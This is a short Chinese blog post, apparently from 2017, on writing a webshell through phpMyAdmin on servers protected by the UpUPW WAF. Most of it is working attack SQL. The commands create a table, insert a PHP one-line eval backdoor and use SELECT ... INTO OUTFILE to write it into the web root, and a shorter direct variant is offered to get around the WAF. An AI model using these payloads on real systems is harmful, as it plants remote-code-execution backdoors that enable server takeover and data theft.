upupw phpmyadmin写shell

废话：

upupw给我的感觉是一个充当了waf毁三观的垃圾程序。然而，我讨厌的程序，管理员都特别喜欢用。

你会发现直接用之前那套写shell的建表然后在值里添加shell代码写到一个路径不可以了。
CREATE TABLE `mysql`.`darkmoon` (`darkmoon1` TEXT NOT NULL );
INSERT INTO `mysql`.`darkmoon` (`darkmoon1` ) VALUES ('<?php @eval($_POST[pass]);?>');
SELECT `darkmoon1` FROM `darkmoon` INTO OUTFILE 'd:/wamp/www/exehack.php';
DROP TABLE IF EXISTS `darkmoon`;

直接可以使用：

select '<?php @eval($_POST[august])?>' into outfile 'D://upupw/XXX.php';

posted @ 2017-06-21 22:59 珍惜少年时阅读(571) 评论(0) 编辑收藏举报

刷新页面返回顶部

可我浪费着我寒冷的年华

可我浪费着我寒冷的年华

upupw phpmyadmin写shell

公告